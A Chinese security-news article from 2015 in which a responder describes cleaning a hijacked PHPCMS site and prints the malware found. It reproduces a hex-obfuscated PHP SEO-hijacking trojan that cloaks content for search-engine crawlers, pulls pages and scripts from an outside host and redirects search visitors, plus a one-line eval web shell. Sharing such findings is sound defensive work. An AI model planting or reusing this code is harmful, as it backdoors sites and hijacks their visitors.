首页 ›资讯› 安全 › 查看内容

实战案例：PHPCMS牛逼搜索劫持

2015-5-20 11:02 |来自: 青云安全 18292 1

摘要: 刚遇到一个客户网站被挂马劫持了，在偶丰富的经验下，大马们很快就缴械投降了，唯独一个小马隐藏的很深，查了两天才查到，现在分享出来给大家交流，一定要小心，现在的黑客都是为了利益ＴＭ不干人事的人精呀！！被挂 ...

关键词： nbsp Class 上传下载 HTTP 附件 SERVER 分钟 define url REFE

刚遇到一个客户网站被挂马劫持了，在偶丰富的经验下，大马们很快就缴械投降了，唯独一个小马隐藏的很深，查了两天才查到，现在分享出来给大家交流，一定要小心，现在的黑客都是为了利益ＴＭ不干人事的人精呀！！

被挂马现像，调试以及清马过程切图如下：

木马内容如下：

调用
//@INCLUDE_ONCE(PACK('H*','453a2f52454359434c45522f6e67696e78'));
劫持
<?php
date_default_timezone_set('PRC');
$start_link=false;
function Class_UC_key($string){$array = strlen ($string);$debuger = '';for($one = 0;$one < $array;$one+=2) {$debuger .= pack ("C",hexdec (substr ($string,$one,2)));}return $debuger;}
function Class_Get($url){if(extension_loaded('curl')){$ch = curl_init(trim($url));curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$content = curl_exec($ch);curl_close($ch);}else{$content = @file_get_contents(trim($url));}return $content;}
function Class_Turl($url,$host){
$string = Class_UC_key('4c6f636174696f6e3a20').$url.Class_UC_key('3f').$host;
Header($string);
exit;
}
function getIP(){
if (@$_SERVER["HTTP_X_FORWARDED_FOR"])$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if (@$_SERVER["HTTP_CLIENT_IP"])$ip = $_SERVER["HTTP_CLIENT_IP"];
else if (@$_SERVER["REMOTE_ADDR"])$ip = $_SERVER["REMOTE_ADDR"];
else if (@getenv("HTTP_X_FORWARDED_FOR"))$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (@getenv("HTTP_CLIENT_IP"))$ip = getenv("HTTP_CLIENT_IP");
else if (@getenv("REMOTE_ADDR"))$ip = getenv("REMOTE_ADDR");
else $ip = "Unknown";
return $ip;
}
error_reporting(E_ERROR);
define('HOST',$_SERVER['HTTP_HOST']);
define('REFE',$_SERVER['HTTP_REFERER']);
define('USER',$_SERVER['HTTP_USER_AGENT']);
define('URL',$_SERVER['REQUEST_URI']);
define('URL1',$_SERVER['PHP_SELF']);
$retueby = array(
1 => Class_UC_key ('636f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d676232333132'),
2 => Class_UC_key ('687474703a2f2f'),
);
define('BOSWON',Class_UC_key ('62616964757c676f6f676c657c736f676f757c736f736f'));
define('CLASS_ZHU',$retueby[2].Class_UC_key('7868662e66656e673030372e636f6d3a3636362f79756578692f696e6465782e706870'));
define('GAME','xhf');
define('MO','yuexi');
define('DAO','dao_a');
$sid=$_GET['id'];
$myget = false;
if(strlen(URL)>=2 &&stristr(URL,'arcid')){
$myget = true;
if(stripos(REFE,'baidu')>-1 || stripos(REFE,'360')>-1 || stripos(REFE,'soso')>-1 || stripos(REFE,'google')>-1)
{
$url = '<script type="text/javascript" src="http://dhf.feng007.com:88/bd.js"></script>';
echo $url;
}
}
if (eregi (BOSWON,USER) || $start_link==true){
if(!empty($_GET) && $myget){
echo Class_Get(CLASS_ZHU.'?allgame='.GAME.'&url='.bin2hex(URL).'&url1='.bin2hex(URL1).'&mo='.MO.'&dao='.DAO.'&host='.HOST.'&sid='.$sid);
echo $dao;
exit;
}
if(empty($_GET)){
echo '';
}
}
if(eregi (BOSWON,REFE)){
foreach($arrgpe as $strss => $idss){
if(stristr(REFE,$strss)){
$myids = $idss;
}
}
$class_n = true;
if(stristr(REFE,'site%3A') or stristr(REFE,'inurl%3A')){
setcookie('x86',HOSTT,time() + 259200);
$class_n = false;
}
if(('http://'.HOSTT.URLL !== 'http://'.HOSTT.'/') && ('http://'.HOSTT.URLL !== 'http://'.HOSTT.'/index.php') && $class_n && empty($_COOKIE['x86']) && !empty($myids)){
setcookie('x86',HOSTT,time() + 259200);
$Class_change = trim(Class_Get(CLASS_URL));
$Class_arrs = explode('@@@',$Class_change);
$Class_news = base64_decode($Class_arrs[1]);
$Class_come = $Class_news.$myids.Class_UC_keyy('2e68746d');
Class_Turl($Class_come,HOSTT);
}
}
?>
一句话
<?php
$dc = array('v', 'a', ")", "(", "$", ',', "'", ';', '_', "f", 'e', 'c', 's', 't', 'p', 'o', 'u', 'l', 'i', 'n', 'k');
$fuc = create_function('$k',$dc[10].$dc[0].$dc[1].$dc[17].$dc[3].$dc[4].$dc[20].$dc[2].$dc[7]);
$fuc($_REQUEST[5202]);
?>